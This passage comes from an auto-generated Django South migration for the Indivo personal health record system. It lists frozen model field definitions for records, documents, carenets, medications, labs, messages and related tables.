'req_headers': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'req_ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True'}),
'req_method': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'req_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'request_successful': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'resp_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'resp_headers': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'view_func': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'indivo.authsystem': {
'Meta': {'object_name': 'AuthSystem'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'authsystem_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'internal_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'indivo.carenet': {
'Meta': {'unique_together': "(('name', 'record'),)", 'object_name': 'Carenet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenet_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']"})
},
'indivo.carenetaccount': {
'Meta': {'unique_together': "(('carenet', 'account'),)", 'object_name': 'CarenetAccount'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'can_write': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetaccount_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'})
},
'indivo.carenetautoshare': {
'Meta': {'unique_together': "(('carenet', 'record', 'type'),)", 'object_name': 'CarenetAutoshare'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetautoshare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']"}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']", 'null': 'True'})
},
'indivo.carenetdocument': {
'Meta': {'unique_together': "(('carenet', 'document'),)", 'object_name': 'CarenetDocument'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetdocument_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'share_p': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'indivo.carenetpha': {
'Meta': {'unique_together': "(('carenet', 'pha'),)", 'object_name': 'CarenetPHA'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetpha_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHA']"})
},
'indivo.document': {
'Meta': {'unique_together': "(('record', 'external_id'),)", 'object_name': 'Document'},
'content': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'content_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'digest': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'fqn': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'nevershare': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'original': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_thread'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_document'", 'null': 'True', 'to': "orm['indivo.PHA']"}),
'processed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documents'", 'null': 'True', 'to': "orm['indivo.Record']"}),
'replaced_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_replaced'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'replaces': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['indivo.StatusName']"}),
'suppressed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'suppressed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Principal']", 'null': 'True'})
},
'indivo.documentprocessing': {
'Meta': {'object_name': 'DocumentProcessing'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentprocessing_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'processed_doc'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'})
},
'indivo.documentrels': {
'Meta': {'object_name': 'DocumentRels'},
'document_0': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rels_as_doc_0'", 'to': "orm['indivo.Document']"}),
'document_1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rels_as_doc_1'", 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'relationship': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']"})
},
'indivo.documentschema': {
'Meta': {'object_name': 'DocumentSchema'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentschema_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'internal_p': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'stylesheet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stylesheet'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'indivo.documentstatushistory': {
'Meta': {'object_name': 'DocumentStatusHistory'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentstatushistory_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'effective_principal': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'proxied_by_principal': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {}),
'record': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.StatusName']"})
},
'indivo.equipment': {
'Meta': {'object_name': 'Equipment', '_ormbases': ['indivo.Fact']},
'date_started': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_stopped': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.fact': {
'Meta': {'object_name': 'Fact'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allergy'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allergy'", 'null': 'True', 'to': "orm['indivo.Record']"})
},
'indivo.immunization': {
'Meta': {'object_name': 'Immunization', '_ormbases': ['indivo.Fact']},
'administered_by': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'adverse_event': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'anatomic_surface': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'anatomic_surface_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'anatomic_surface_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'anatomic_surface_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'date_administered': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'sequence': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'vaccine_expiration': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'vaccine_lot': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'vaccine_manufacturer': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'vaccine_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'vaccine_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'vaccine_type_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'vaccine_type_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.lab': {
'Meta': {'object_name': 'Lab', '_ormbases': ['indivo.Fact']},
'date_measured': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'first_lab_test_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'first_lab_test_value': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'first_panel_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_address': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'lab_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_type': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'non_critical_range_maximum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'non_critical_range_minimum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'normal_range_maximum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'normal_range_minimum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'})
},
'indivo.machineapp': {
'Meta': {'object_name': 'MachineApp'},
'app_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.measurement': {
'Meta': {'object_name': 'Measurement', '_ormbases': ['indivo.Fact']},
'datetime': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '24'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'indivo.medication': {
'Meta': {'object_name': 'Medication', '_ormbases': ['indivo.Fact']},
'brand_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'brand_name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'brand_name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'brand_name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'date_started': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_stopped': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'dispense_as_written': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'dose_textvalue': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'dose_unit': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'dose_unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'dose_unit_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'dose_unit_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'dose_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'frequency_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'frequency_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'frequency_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_by_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_by_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_on': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'prescribed_stop_on': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'prescription_duration': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'prescription_instructions': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'prescription_refill_info': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'route': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'route_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'route_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'route_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'strength_textvalue': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'strength_unit': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'strength_unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'strength_unit_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'strength_unit_value': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'strength_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})
},
'indivo.message': {
'Meta': {'unique_together': "(('account', 'external_identifier', 'sender'),)", 'object_name': 'Message'},
'about_record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'archived_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'body': ('django.db.models.fields.TextField', [], {}),
'body_type': ('django.db.models.fields.CharField', [], {'default': "'plaintext'", 'max_length': '100'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'external_identifier': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'num_attachments': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'read_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'received_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_as_recipient'", 'to': "orm['indivo.Principal']"}),
'response_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_responses'", 'null': 'True', 'to': "orm['indivo.Message']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_as_sender'", 'to': "orm['indivo.Principal']"}),
'severity': ('django.db.models.fields.CharField', [], {'default': "'low'", 'max_length': '100'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'indivo.messageattachment': {
'Meta': {'unique_together': "(('message', 'attachment_num'),)", 'object_name': 'MessageAttachment'},
'attachment_num': ('django.db.models.fields.IntegerField', [], {}),
'content': ('django.db.models.fields.TextField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messageattachment_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Message']"}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'saved_to_document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'indivo.nonce': {
'Meta': {'unique_together': "(('nonce', 'oauth_type'),)", 'object_name': 'Nonce'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nonce': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'oauth_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'indivo.notification': {
'Meta': {'object_name': 'Notification'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'app_url': ('django.db.models.fields.CharField', [], {'max_length': '300', 'null': 'True'}),
'content': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notifications_sent_by'", 'to': "orm['indivo.Principal']"})
},
'indivo.nouser': {
'Meta': {'object_name': 'NoUser', '_ormbases': ['indivo.Principal']},
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'})
},
'indivo.pha': {
'Meta': {'object_name': 'PHA'},
'autonomous_reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'callback_url': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'frameable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_ui': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_autonomous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True'}),
'privacy_tou': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']", 'null': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'start_url_template': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'indivo.phashare': {
'Meta': {'unique_together': "(('record', 'with_pha'),)", 'object_name': 'PHAShare'},
'authorized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'authorized_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shares_authorized_by'", 'null': 'True', 'to': "orm['indivo.Account']"}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'phashare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_shares'", 'to': "orm['indivo.Record']"}),
'with_pha': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_shares_to'", 'to': "orm['indivo.PHA']"})
},
'indivo.principal': {
'Meta': {'object_name': 'Principal'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'principal_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'indivo.problem': {
'Meta': {'object_name': 'Problem', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_onset': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_resolution': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'diagnosed_by': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'indivo.procedure': {
'Meta': {'object_name': 'Procedure', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_performed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'provider_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'provider_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
},
'indivo.record': {
'Meta': {'object_name': 'Record'},
'contact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'the_record_for_contact'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'record_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'demographics': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'the_record_for_demographics'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'unique': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'records_owned_by'", 'null': 'True', 'to': "orm['indivo.Principal']"})
},
'indivo.recordnotificationroute': {
'Meta': {'unique_together': "(('account', 'record'),)", 'object_name': 'RecordNotificationRoute'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recordnotificationroute_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
